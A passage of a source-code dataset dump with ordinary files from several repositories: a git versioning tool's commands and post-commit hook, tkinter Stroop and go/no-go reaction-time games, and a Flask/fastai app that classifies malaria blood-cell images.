os.path.exists(CFGDIR):\n i += 1\n os.makedirs(CFGDIR)\n print \"Created \" + CFGDIR\n\n if not os.path.exists(TPLDIR):\n i += 1\n 
os.makedirs(TPLDIR)\n print \"Created \" + TPLDIR\n\n check_gitignore()\n\n if i > 0:\n print \"Done.\"\n else:\n print \"Nothing to do.\"\n\n\ndef cmd_info(args):\n next_store = KVStore(NEXT_STORE_FILE)\n repo_info = get_repo_info()\n last_tag = repo_info['last-tag']\n\n has_next_custom = next_store.has(last_tag)\n next_custom = next_store.get(last_tag) if has_next_custom else None\n\n if has_next_custom:\n nvn = color_next(next_custom)\n else:\n nvn = \"none defined, using \" + color_next(\"-\" + cfg['next_suffix']) + \\\n \" suffix\"\n\n print \"Most recent tag: \" + color_tag(last_tag)\n print \"NEXT defined as: \" + nvn\n print \"Current build ID: \" + color_tag(repo_info['full-build-id'])\n print \"Current version: \" + \\\n color_version(\"v\" + build_version_string(repo_info, next_custom))\n\n\ndef cmd_list_templates(args):\n tpls = [f for f in os.listdir(TPLDIR) if os.path.isfile(template_path(f))]\n if len(tpls) > 0:\n print \"Available templates:\"\n for t in tpls:\n print \" \" + bold(t) + \" (\" + template_path(t) + \")\"\n else:\n print \"No templates available in \" + TPLDIR\n\n\ndef cmd_build_template(args):\n next_store = KVStore(NEXT_STORE_FILE)\n repo_info = get_repo_info()\n last_tag = repo_info['last-tag']\n has_next_custom = next_store.has(last_tag)\n next_custom = next_store.get(last_tag) if has_next_custom else None\n parse_templates(args.templates, repo_info, next_custom)\n\n\ndef cmd_next(args):\n next_store = KVStore(NEXT_STORE_FILE)\n repo_info = get_repo_info()\n\n last_tag = repo_info['last-tag']\n\n vn = args.next_version_numbers\n user = user_numbers_from_string(vn)\n if not user:\n print err(\"Please specify valid version numbers.\\nThe expected \"\n \"format is <MAJ>.<MIN>.<PATCH>, e.g. v0.0.1 or 0.0.1\")\n sys.exit(1)\n\n custom = \"%d.%d.%d\" % (int(user[0]), int(user[1]), int(user[2]))\n next_store.set(last_tag, custom).save()\n print \"Set NEXT version string to \" + color_next(custom) + \\\n \" for the current tag \" + color_tag(last_tag)\n\n\ndef cmd_clean(args):\n next_store = KVStore(NEXT_STORE_FILE)\n if len(args.tag) > 0:\n tag = args.tag\n else:\n repo_info = get_repo_info()\n tag = repo_info['last-tag']\n\n has_custom = next_store.has(tag)\n next_custom = next_store.get(tag) if has_custom else None\n\n if has_custom:\n next_store.rm(tag).save()\n print \"Cleaned up custom string version \\\"\" + next_custom + \\\n \"\\\" for tag \\\"\" + tag + \"\\\"\"\n else:\n print \"No custom string version found for tag \\\"\" + tag + \"\\\"\"\n\n\ndef cmd_cleanall(args):\n if os.path.exists(NEXT_STORE_FILE):\n os.unlink(NEXT_STORE_FILE)\n print \"Custom strings removed.\"\n else:\n print \"No NEXT custom strings found.\"\n\n\ndef cmd_list_next(args):\n next_store = KVStore(NEXT_STORE_FILE)\n repo_info = get_repo_info()\n last_tag = repo_info['last-tag']\n has_next_custom = next_store.has(last_tag)\n if not next_store.empty():\n def print_item(k, v):\n print \" %s => %s\" % (color_tag(k), color_next(v)) +\\\n (' (*)' if k == last_tag else '')\n\n print \"Currently set NEXT custom strings (*=most recent \" \\\n \"and reachable tag):\"\n for tag, vstring in sorted(next_store.items()):\n print_item(tag, vstring)\n\n if not has_next_custom:\n print_item(last_tag, '<undefined>')\n\n else:\n print \"No NEXT custom strings set.\"\n"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 29.66666603088379,
"blob_id": "46f67ae2a9c28db32e39820ec9fdf5fcbc3507f9",
"content_id": "e64305c12dc02badab8bf2c4090b48804f22ec02",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 92,
"license_type": "permissive",
"max_line_length": 40,
"num_lines": 3,
"path": "/hooks/post-commit",
"repo_name": "nexiles/gitver",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n# gitver should be in your path to work!\n/home/manuel/bin/gitver update version\n"
}
] | 3 |
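The gitver command module above validates user-supplied version strings with `user_version_matcher` (`v{0,1}(\d+)\.(\d+)\.(\d+)$`), wrapping `.groups()` in a try/except for AttributeError. Below is a minimal Python 3 sketch of the same check with an explicit None test instead of the exception dance; `parse_version` is an illustrative name, not part of gitver.

```python
import re

# Same pattern as gitver's user_version_matcher; v{0,1} is equivalent to v?.
VERSION_RE = re.compile(r"v?(\d+)\.(\d+)\.(\d+)$")

def parse_version(text):
    """Return (major, minor, patch) as ints, or None when the string
    is not a plain MAJ.MIN.PATCH version."""
    m = VERSION_RE.match(text)
    if m is None:
        return None
    return tuple(int(n) for n in m.groups())

assert parse_version("v0.4.2") == (0, 4, 2)
assert parse_version("1.2") is None  # needs all three components
```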
littleshin/ReactionPsyGames | https://github.com/littleshin/ReactionPsyGames | 31018ac6d126d458103a297b8bf6bcf3886964b6 | ce4485556305f4e1f685776b532a45102f0ac0b5 | 6e8c4ec9f44b03f3460091aa778c56432a4976ca | refs/heads/master | 2022-11-27T11:27:47.568807 | 2020-07-29T08:44:59 | 2020-07-29T08:44:59 | 281,196,594 | 0 | 4 | null | 2020-07-20T18:32:30 | 2020-07-29T08:45:04 | 2020-07-29T08:45:01 | Python |
[
{
"alpha_fraction": 0.5411034226417542,
"alphanum_fraction": 0.5659310221672058,
"avg_line_length": 40.67241287231445,
"blob_id": "fc66a7973ce992e4cf8bcff50bf1ce7016f8c0a5",
"content_id": "52427f2ecd690fbe784f646783bf54d38d402bab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7696,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 174,
"path": "/stroop.py",
"repo_name": "littleshin/ReactionPsyGames",
"src_encoding": "UTF-8",
"text": "##########################################################\n# 作者: 楊晉佳\n##########################################################\nimport tkinter as tk\nimport tkinter.font as font\nimport random \nimport time\n\nTRIAL_TIMES = 100\n\nclass stroop():\n def __init__(self, window):\n self.word_list = ['紅', '黃', '綠', '藍']\n self.color_list = ['red', 'yellow', 'green', 'blue']\n self.correct_ans = ''\n self.trial = 0\n self.spawn_time = 0.0\n self.congruent_time_list = []\n self.fontsize = font.Font(size=24)\n self.incongruent_time_list = []\n self.window = window\n self.canvas = tk.Canvas(window, bg='white', height=600, width=800)\n self.is_congruent = None\n self.btn = None\n self.refresh = None\n self.congruent_false = 0\n self.incongruent_false = 0\n \n '''self.window = tk.Tk()\n self.window.title('stroop')\n self.window.geometry('500x500') '''\n\n '''def menu_picture(self):\n self.btn = tk.Button(self.window, text=\"start\", width=20, height=5)\n self.btn.place(x=330, y=230)\n self.btn.config(command=self.tutorial)'''\n\n def tutorial(self):\n #self.btn.destroy()\n self.canvas.create_text(400, 120, font=(\"Times New Roman\", 28), text='判斷文字顏色')\n self.canvas.create_text(400, 200, font=(\"Times New Roman\", 20), text='開始後請依照上方出現的文字顏色作答')\n self.canvas.create_text(400, 250, font=(\"Times New Roman\", 20), text='作答時按鍵盤上對應答案的數字')\n self.canvas.create_text(400, 300, font=(\"Times New Roman\", 20), text='紅 黃 綠 藍')\n self.canvas.create_text(400, 350, font=(\"Times New Roman\", 20), text='1 4 7 0')\n self.canvas.create_text(400, 400, font=(\"Times New Roman\", 20), text='準備好就可以開始!')\n self.canvas.pack()\n self.btn = tk.Button(self.window, text=\"開始遊戲\", width=15, height=4)\n self.btn.place(x=330, y=450)\n self.btn.config(command=self.run)\n\n def color_trigger(self, ans_color=\"None\"):\n if self.correct_ans == ans_color:\n self.result_label.configure(text='正確!', font=self.fontsize)\n if self.is_congruent == True:\n self.congruent_time_list.append(time.time()-self.spawn_time)\n else:\n self.incongruent_time_list.append(time.time()-self.spawn_time)\n else:\n self.result_label.configure(text='錯誤!', font=self.fontsize)\n if self.is_congruent == True:\n self.congruent_false += 1\n else:\n self.incongruent_false += 1\n self.check_trial()\n self.new_question()\n \n def key_press(self, event):\n if event.char == '1':\n self.color_trigger('red')\n elif event.char == '4':\n self.color_trigger('yellow')\n elif event.char == '7':\n self.color_trigger('green')\n elif event.char == '0':\n self.color_trigger('blue') \n\n def new_question(self):\n c = random.randint(0, 3)\n w = random.randint(0, 3)\n if c==w:\n self.is_congruent = True\n else:\n self.is_congruent = False\n self.correct_ans = self.color_list[c]\n self.description_label.configure(text=self.word_list[w], font=font.Font(size=36),fg=self.correct_ans, bg='black')\n self.spawn_time = time.time()\n self.trial += 1\n \n def check_trial(self):\n if self.trial == TRIAL_TIMES:\n self.instruction_label.destroy()\n self.description_label.destroy()\n self.result_label.destroy()\n self.label_frame.destroy()\n self.ans_frame.destroy()\n self.key_frame.destroy()\n self.canvas = tk.Canvas(self.window, bg='white', height=600, width=800)\n if len(self.congruent_time_list) != 0:\n congruent_avg = sum(self.congruent_time_list)/len(self.congruent_time_list)\n else:\n congruent_avg = 0.0\n \n if len(self.incongruent_time_list) != 0:\n incongruent_avg = sum(self.incongruent_time_list)/len(self.incongruent_time_list)\n else:\n incongruent_avg = 0.0 \n\n 
#print('Congruent: {:.3f}'.format(congruent_avg))\n #print('Incongruent: {:.3f}'.format(incongruent_avg))\n \n self.canvas.create_text(400, 200, font=(\"Times New Roman\", 24), text='在有答對的情況下')\n self.canvas.create_text(400, 250, font=(\"Times New Roman\", 24), text='文字跟顏色一致時你的判斷時間 : {:.3f}'.format(congruent_avg))\n self.canvas.create_text(400, 300, font=(\"Times New Roman\", 24), text='文字跟顏色不一致時你的判斷時間 : {:.3f}'.format(incongruent_avg))\n self.canvas.create_text(400, 350, font=(\"Times New Roman\", 24), text='史楚普效應為後者時間減去前者時間 : {:.3f}'.format(incongruent_avg-congruent_avg))\n self.canvas.create_text(400, 500, font=(\"Times New Roman\", 24), text='按下Esc鍵繼續...')\n self.canvas.pack()\n self.window.bind(\"<Escape>\", lambda event:self.refresh())\n #exit(0)\n \n #write file\n file = open('結果', 'w')\n file.write('文字跟顏色一致時你的錯誤次數 : {}\\n'.format(self.congruent_false))\n file.write('文字跟顏色不一致時你的錯誤次數 : {}\\n'.format(self.incongruent_false))\n file.write('文字跟顏色一致時你的判斷時間 : {:.3f}\\n'.format(congruent_avg))\n file.write('文字跟顏色不一致時你的判斷時間 : {:.3f}\\n'.format(incongruent_avg))\n file.write('史楚普效應為後者時間減去前者時間 : {:.3f}\\n'.format(incongruent_avg-congruent_avg))\n \n def run(self):\n self.btn.destroy()\n self.canvas.destroy()\n\n self.instruction_label = tk.Label(self.window, font=self.fontsize, text='看到下面的有色字 選擇與顏色對應的答案')\n self.instruction_label.pack()\n \n self.btn.destroy()\n self.description_label = tk.Label(self.window, width=6, height=3)\n self.description_label.pack()\n\n self.result_label = tk.Label(self.window)\n self.result_label.pack()\n \n\n self.ans_frame = tk.Frame(self.window)\n self.ans_frame.pack(side=tk.TOP)\n self.label_and_pack_demo_char('紅', self.ans_frame)\n self.label_and_pack_demo_char('黃', self.ans_frame)\n self.label_and_pack_demo_char('綠', self.ans_frame)\n self.label_and_pack_demo_char('藍', self.ans_frame)\n \n self.label_frame = tk.Frame(self.window)\n self.label_frame.pack(side=tk.TOP)\n self.label_and_pack_demo_char('1', self.label_frame)\n self.label_and_pack_demo_char('4', self.label_frame)\n self.label_and_pack_demo_char('7', self.label_frame)\n self.label_and_pack_demo_char('0', self.label_frame)\n \n self.key_frame = tk.Frame(self.window)\n self.key_frame.bind(\"<KeyPress>\", self.key_press)\n self.key_frame.pack()\n self.key_frame.focus_set()\n \n self.new_question()\n\n def label_and_pack_demo_char(self, t, frame):\n label = tk.Label(frame, text=t, font=self.fontsize, width=6, height=2)\n label.pack(side = tk.LEFT,fill=\"x\", expand=True) \n pass\n\nif __name__ == '__main__':\n window = tk.Tk()\n window.geometry('800x600')\n stroop_test = stroop(window)\n stroop_test.menu_picture()\n window.mainloop()"
},
{
"alpha_fraction": 0.5097496509552002,
"alphanum_fraction": 0.5508869290351868,
"avg_line_length": 41.513370513916016,
"blob_id": "ac0a2502d92693e2029c497075b2c17a3acd5d08",
"content_id": "8ef789959bfd2e33196078484fd611ccfa753098",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8205,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 187,
"path": "/gonogo.py",
"repo_name": "littleshin/ReactionPsyGames",
"src_encoding": "UTF-8",
"text": "##########################################################\n# 作者: 蔡昌廷\n##########################################################\nimport numpy as np\nimport cv2\nimport tkinter as tk\nimport time\nimport csv\nfrom tkinter import ttk\nfrom PIL import ImageTk, Image\n\nclass go_nogo_Game(object):\n def __init__(self, window):\n self.window = window\n self.canvas = tk.Canvas(window, bg='lightgreen', height=600, width=800)\n self.start_time = 0\n self.end_time = 0\n self.zone_size = 150\n self.zone_x = 400\n self.zone_y = 300\n self.strike = 1\n self.ball = 0\n self.error = 0\n self.fp = 0\n self.fn = 0\n self.press = False\n self.btn = None\n self.run_step = 100\n self.curr_step = 1\n self.record_time = []\n self.respond_time = []\n self.table = None\n self.refresh = None\n\n '''def menu_picture(self):\n self.btn = tk.Button(self.window, text=\"start\", width=20, height=5)\n self.btn.place(x=330, y=230)\n self.btn.config(command=self.tutorial)'''\n\n def tutorial(self):\n #self.btn.destroy()\n self.canvas.create_text(400, 120, font=(\"Times New Roman\", 28), text='判斷好壞球')\n self.canvas.create_text(400, 200, font=(\"Times New Roman\", 20), text='以下會有一百顆球,若為好球請按空白鍵')\n self.canvas.create_text(400, 250, font=(\"Times New Roman\", 20), text='一百顆球後,將會顯示所有球的反應時間')\n self.canvas.create_text(400, 300, font=(\"Times New Roman\", 20), text='請加油!')\n self.canvas.pack()\n self.btn = tk.Button(self.window, text=\"開始遊戲\", width=15, height=4)\n self.btn.place(x=330, y=400)\n self.btn.config(command=self.main)\n\n def create_zone(self):\n # zone position : [x:250-550 , y:150-450]\n self.btn.destroy()\n self.canvas.delete(\"all\")\n self.canvas.configure(bg='lightgreen')\n self.canvas.create_rectangle(400-self.zone_size, 300-self.zone_size, 400+self.zone_size, 300+self.zone_size, tags='zone')\n '''\n self.canvas.create_line(250, 250, 550, 250, fill=\"black\", tags='zone')\n self.canvas.create_line(250, 350, 550, 350, fill=\"black\", tags='zone')\n self.canvas.create_line(350, 150, 350, 450, fill=\"black\", tags='zone')\n self.canvas.create_line(450, 150, 450, 450, fill=\"black\", tags='zone')\n '''\n self.canvas.pack()\n\n def create_circle(self):\n # zone position : [x:250-550 , y:150-450]\n self.press = False\n oval_x = np.random.rand(1)[0] * 400 + 200 # 200 - 600\n oval_y = np.random.rand(1)[0] * 400 + 100 # 100 - 500\n oval_size = 10\n ball_pos = (abs(oval_x - (self.zone_x - self.zone_size)) < 10) or (abs(oval_x - (self.zone_x + self.zone_size)) < 10) or \\\n (abs(oval_y - (self.zone_y - self.zone_size)) < 10) or (abs(oval_y - (self.zone_y - self.zone_size)) < 10)\n while ball_pos:\n oval_x = np.random.rand(1)[0] * 400 + 200 # 200 - 600\n oval_y = np.random.rand(1)[0] * 400 + 100 # 100 - 500\n ball_pos = (abs(oval_x - (self.zone_x - self.zone_size)) < 10) or (abs(oval_x - (self.zone_x + self.zone_size)) < 10) or \\\n (abs(oval_y - (self.zone_y - self.zone_size)) < 10) or (abs(oval_y - (self.zone_y - self.zone_size)) < 10)\n self.canvas.create_oval(oval_x - oval_size, oval_y - oval_size, oval_x + oval_size, oval_y + oval_size, fill='red', outline = \"red\", tags='circle') \n ball_status = self.detect_circle(oval_x, oval_y)\n self.canvas.update()\n self.start_time = time.time()\n self.window.bind(\"<space>\", lambda event:self.press_space(ball_status))\n self.window.after(2000, lambda: self.delete_circle(ball_status))\n\n def delete_circle(self, ball_status):\n self.canvas.delete('circle')\n self.canvas.update()\n if self.press == False:\n self.end_time = time.time()\n 
self.record_time.append(self.end_time - self.start_time)\n if ball_status == self.strike:\n self.fn += 1\n if self.curr_step < self.run_step:\n self.curr_step += 1\n self.create_circle()\n else:\n self.show_result()\n\n def press_space(self, ball_status):\n if self.press == False:\n self.end_time = time.time()\n self.record_time.append(self.end_time - self.start_time)\n self.press = True\n if ball_status == self.ball:\n self.fp += 1\n self.canvas.delete('circle')\n self.canvas.update()\n if ball_status == self.strike:\n self.respond_time.append(self.end_time - self.start_time)\n\n def detect_circle(self, x, y):\n if x > self.zone_x - self.zone_size and x < self.zone_x + self.zone_size:\n if y > self.zone_y - self.zone_size and y < self.zone_y + self.zone_size:\n return self.strike\n else:\n return self.ball\n else:\n return self.ball\n\n def show_result(self):\n self.canvas.delete('zone')\n # Respond time\n if len(self.respond_time) > 0:\n response_time_text = '反應時間 : ' + str(round(sum(self.respond_time)/len(self.respond_time), 3)) + ' 秒'\n respond_time = self.canvas.create_text(400, 100, font=(\"Purisa\", 24), text=response_time_text)\n else:\n respond_time = self.canvas.create_text(400, 100, font=(\"Purisa\", 24), text='反應時間 : 0 秒') \n \n # Respond table\n style = ttk.Style(self.window)\n style.theme_use(\"clam\")\n style.configure(\"Treeview\", background=\"black\", \n fieldbackground=\"lightgreen\", foreground=\"white\")\n item = ['編號', '反應時間(秒)']\n self.table = ttk.Treeview(self.window, columns=item, show=\"headings\")\n for i in item:\n self.table.column(i, anchor='center')\n self.table.heading(i, text=i)\n for i in range(len(self.record_time)):\n if (i+1) % 2 == 1:\n self.table.insert('', 'end', values=[str(i+1), str(round(self.record_time[i], 3))], tags=('odd'))\n else:\n self.table.insert('', 'end', values=[str(i+1), str(round(self.record_time[i], 3))], tags=('even'))\n self.table.place(x=200, y=150)\n\n # Accuracy\n self.canvas.create_text(400, 500, font=(\"Purisa\", 24), text='準確率: {} %'.format(100 * (self.run_step - (self.fp + self.fn)) / self.run_step))\n self.canvas.create_text(400, 550, font=(\"Purisa\", 12), text='按下Esc鍵繼續...')\n self.window.bind(\"<Escape>\", lambda event:self.refresh())\n\n # save the result\n self.btn = tk.Button(self.window, text=\"儲存結果\", width=10, height=3)\n self.btn.place(x=350, y=400)\n self.btn.config(command=self.save_result)\n \n def save_result(self):\n f = open('result.txt', 'w')\n f.write('編號 反應時間(秒)\\n')\n for i in range(len(self.record_time)):\n result = '{} {}\\n'.format(i+1, round(self.record_time[i], 3))\n f.write(result)\n if i == len(self.record_time) - 1:\n f.write('\\n') \n if len(self.respond_time) == 0:\n f.write('整體反應時間 : 0 秒\\n')\n else:\n f.write('整體平均反應時間 : {} 秒\\n'.format(round(sum(self.respond_time)/len(self.respond_time), 3)))\n f.write('整體錯誤次數 : {} 次\\n'.format(self.fn + self.fp))\n f.write('好球沒按到次數 : {} 次\\n'.format(self.fn))\n f.write('壞球按錯次數 : {} 次\\n'.format(self.fp))\n\n def main(self):\n self.create_zone()\n self.canvas.update() \n self.canvas.after(1000)\n self.create_circle()\n \nif __name__ == '__main__':\n window=tk.Tk()\n window.title('Go nogo')\n window.geometry('800x600')\n window.configure(background='white')\n canvas = tk.Canvas(window, bg='white', height=600, width=800)\n run_step = 100\n game = go_nogo_Game(window, canvas)\n game.menu_picture()\n window.mainloop()"
},
{
"alpha_fraction": 0.5631067752838135,
"alphanum_fraction": 0.576392412185669,
"avg_line_length": 30.079364776611328,
"blob_id": "e49587af75cc4c30f63c4402be67eb2fc2366912",
"content_id": "776000991fe2c24777e3c62cc9625bbd73c3bd42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2005,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 63,
"path": "/main.py",
"repo_name": "littleshin/ReactionPsyGames",
"src_encoding": "UTF-8",
"text": "##########################################################\n# 作者: 曹峻豪\n##########################################################\nfrom gonogo import go_nogo_Game\nfrom stroop import stroop\nimport tkinter as tk\n\nclass Manager():\n def __init__(self, window, gonogo, stroop):\n self.window = window\n self.gonogo = gonogo\n self.stroop = stroop\n self.btn1 = None\n self.btn2 = None\n\n def menu_page(self):\n self.btn1 = tk.Button(self.window, text=\"判斷好球遊戲\", width=30, height=10)\n self.btn1.config(command=self.run_gonogo)\n self.btn1.pack()\n self.btn2 = tk.Button(self.window, text=\"判斷顏色遊戲\", width=30, height=10)\n self.btn2.config(command=self.run_stroop)\n self.btn2.pack()\n\n def destroy_all_button(self):\n self.btn1.destroy()\n self.btn2.destroy()\n \n def run_gonogo(self):\n self.destroy_all_button()\n self.gonogo.refresh = self.gonogo_refresh\n self.gonogo.tutorial()\n\n def run_stroop(self):\n self.destroy_all_button()\n self.stroop.refresh = self.stroop_refresh\n self.stroop.tutorial()\n \n def gonogo_refresh(self):\n self.gonogo.table.destroy()\n self.gonogo.canvas.destroy()\n self.window.unbind(\"<Escape>\")\n self.gonogo.__init__(self.window)\n self.__init__(self.window,self.gonogo,self.stroop)\n self.menu_page()\n \n def stroop_refresh(self):\n self.stroop.canvas.destroy()\n self.window.unbind(\"<Escape>\")\n self.stroop.__init__(self.window)\n self.__init__(self.window,self.gonogo,self.stroop)\n self.menu_page()\n\nif __name__=='__main__':\n window=tk.Tk()\n window.title('反應測試小遊戲')\n window.geometry('800x600')\n window.configure(background='white')\n window.resizable(0,0)\n gonogo = go_nogo_Game(window)\n stroop = stroop(window)\n manager = Manager(window, gonogo, stroop)\n manager.menu_page()\n window.mainloop()"
}
] | 3 |
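Both games in the ReactionPsyGames record above measure the player the same way: `time.time()` is stamped when the stimulus appears (`self.spawn_time`) and subtracted inside the key handler. A stripped-down, standard-library-only sketch of that timing pattern (widget text and names are illustrative):

```python
import time
import tkinter as tk

# Stamp the clock when the stimulus appears, subtract it on the keypress,
# mirroring stroop.py's spawn_time / key_press flow.
root = tk.Tk()
tk.Label(root, text="Press <space> as fast as you can").pack()
spawn_time = time.time()

def on_space(event):
    print("reaction time: {:.3f} s".format(time.time() - spawn_time))
    root.destroy()

root.bind("<space>", on_space)
root.mainloop()
```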
stefkim/malaria_blood_cells_image_classification | https://github.com/stefkim/malaria_blood_cells_image_classification | 0b8b2e5049cbdaf64c5360c5a5d86031104267dd | fb9fa41dc26a55b0599173bccfe65864ef8a4fd7 | af9f9f7913432bbe50669a7ec0d5723f6ab8ac6d | refs/heads/master | 2022-08-05T03:10:07.118060 | 2020-05-26T01:50:38 | 2020-05-26T01:50:38 | 224,145,582 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7666666507720947,
"alphanum_fraction": 0.7666666507720947,
"avg_line_length": 30,
"blob_id": "c4da17593652189758ac4b898b842ca1a3a9c7bf",
"content_id": "0102b1af05bf413207380b16739cffc5365dfc44",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 30,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 1,
"path": "/web/static/images/readme.md",
"repo_name": "stefkim/malaria_blood_cells_image_classification",
"src_encoding": "UTF-8",
"text": "## uploaded image will be here"
},
{
"alpha_fraction": 0.5625,
"alphanum_fraction": 0.5625,
"avg_line_length": 32,
"blob_id": "8da9c8b2993b455de7d9eba57b71637aa30dce44",
"content_id": "34e87e078ff954ef678995c0ca2f355b63f0c179",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 32,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 1,
"path": "/web/models/readme.md",
"repo_name": "stefkim/malaria_blood_cells_image_classification",
"src_encoding": "UTF-8",
"text": "## put your ```.pth``` file here"
},
{
"alpha_fraction": 0.722449004650116,
"alphanum_fraction": 0.8081632852554321,
"avg_line_length": 47.79999923706055,
"blob_id": "38b3f72c6e6e578fd49dc5b0d711bbb7dee50405",
"content_id": "61867eafac305e0c0a6c4dc19e6b1bd18a73146f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 245,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 5,
"path": "/README.md",
"repo_name": "stefkim/malaria_blood_cells_image_classification",
"src_encoding": "UTF-8",
"text": "# KP_1772023_Malaria_Detection\n\nLink Google Colab : https://colab.research.google.com/drive/12R8yTZdHY-CFz1adJ7cQoN2nJcZO1taK?usp=sharing \\\n\nLink Google Doc : https://drive.google.com/file/d/1Fy1WzuYS5eCtL6m6vLctAq4DzKrnB3hZ/view?usp=sharing \\\n\n"
},
{
"alpha_fraction": 0.6428571343421936,
"alphanum_fraction": 0.761904776096344,
"avg_line_length": 9.75,
"blob_id": "bad4655c713a4b17a8c8071c51d464a773eef17d",
"content_id": "41ce6842eb2366c7068736b8df733f2632c13eae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 42,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 4,
"path": "/web/requirements.txt",
"repo_name": "stefkim/malaria_blood_cells_image_classification",
"src_encoding": "UTF-8",
"text": "Flask\ntorch==1.4\ntorchvision==0.5.0\nfastai"
},
{
"alpha_fraction": 0.5012973546981812,
"alphanum_fraction": 0.5080435872077942,
"avg_line_length": 34.685184478759766,
"blob_id": "da4f9c514dbd3902bf846463357094995f358396",
"content_id": "ea0d7a4d01981ea7e2e03d708f6a1a35522d363d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1927,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 54,
"path": "/web/app.py",
"repo_name": "stefkim/malaria_blood_cells_image_classification",
"src_encoding": "UTF-8",
"text": "from flask import Flask, redirect, url_for, request, render_template\nfrom pathlib import Path\nfrom werkzeug.utils import secure_filename\nfrom fastai import *\nfrom fastai.vision import *\nfrom fastai.callbacks.hooks import *\n\nUPLOAD_FOLDER = 'static/images/'\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\npath = Path('')\nclasses = ['Parasitized', 'Uninfected']\ndata = ImageDataBunch.single_from_classes(path, classes,\n ds_tfms=get_transforms(do_flip = True,\n flip_vert = True,\n max_warp=0),\n size=224\n ).normalize(imagenet_stats)\nmodel = cnn_learner(data,models.resnet34)\nmodel.load('stage1')\n\ndef predict(file_path):\n img = open_image(file_path)\n return model.predict(img)\n\[email protected]('/')\ndef index():\n return render_template('index.html')\n\[email protected]('/', methods=['GET', 'POST'])\ndef upload_data():\n if request.method == 'POST':\n image = request.files['file']\n if image.filename == '':\n return render_template('index.html',\n err = True)\n else:\n img_file = request.files['file']\n img_path = os.path.join(app.config['UPLOAD_FOLDER'], \n secure_filename(img_file.filename))\n img_file.save(img_path)\n\n prediction = predict(img_path)\n\n return render_template('index.html',\n result_class=str(prediction[0]),\n result_accuracy = '{:.3f}%'.format(float(max(prediction[2]))*100),\n result_image = img_path,\n show_modal = True)\n return None\n\nif __name__ == '__main__':\n app.run()\n"
},
{
"alpha_fraction": 0.6278316974639893,
"alphanum_fraction": 0.6278316974639893,
"avg_line_length": 22.69230842590332,
"blob_id": "09122706c469ed007ef94946f7d18c8a762f4c4d",
"content_id": "82e1061cf2c76e7d5bba540a6c8cb08211be467e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 309,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 13,
"path": "/web/README.md",
"repo_name": "stefkim/malaria_blood_cells_image_classification",
"src_encoding": "UTF-8",
"text": "\n## Web for Malaria Classification using FastAI\n \n- uploaded image stored at ```static/images``` folder \n- trained model stored at ```models``` folder \n \n \n### How to run this code \\ \ncopy ```.pth``` file to ```models/``` folder \n \ninstall requirments \n``` \npip install -r requirements.txt \n```\n"
}
] | 6 |
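The `app.py` entry above follows a save-then-classify flow: pull the upload from `request.files`, sanitize the name with `secure_filename`, write it under `UPLOAD_FOLDER`, then run the fastai model on the saved path. A minimal sketch of just the Flask upload half (the `/upload` route name is illustrative; the fastai `predict` call is omitted because it is version-sensitive):

```python
import os
from flask import Flask, request
from werkzeug.utils import secure_filename

app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = 'static/images/'

@app.route('/upload', methods=['POST'])  # illustrative route, not from app.py
def upload():
    img_file = request.files['file']
    img_path = os.path.join(app.config['UPLOAD_FOLDER'],
                            secure_filename(img_file.filename))
    img_file.save(img_path)  # the model would classify img_path here
    return 'saved to ' + img_path
```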
MarcusLS/rscGenerator-py | https://github.com/MarcusLS/rscGenerator-py | c5ffef00edc45e1582ebd6656c542dbd11eabf50 | b14df0a96d4ab6312cfcb50be743c44c84f28f23 | 3a8177cc169cf3c40ac7838e372ec6bc4e97ed60 | refs/heads/master | 2021-01-15T19:19:19.329161 | 2013-08-29T21:57:17 | 2013-08-29T21:57:17 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6159420013427734,
"alphanum_fraction": 0.6239935755729675,
"avg_line_length": 28.571428298950195,
"blob_id": "37de5fc9c7353604cd42620cfd0bc967e9709efd",
"content_id": "6e034e946ad756cb91a1d3478685aa6ada25cbea",
"detected_licenses": [
"WTFPL"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1242,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 42,
"path": "/README.md",
"repo_name": "MarcusLS/rscGenerator-py",
"src_encoding": "UTF-8",
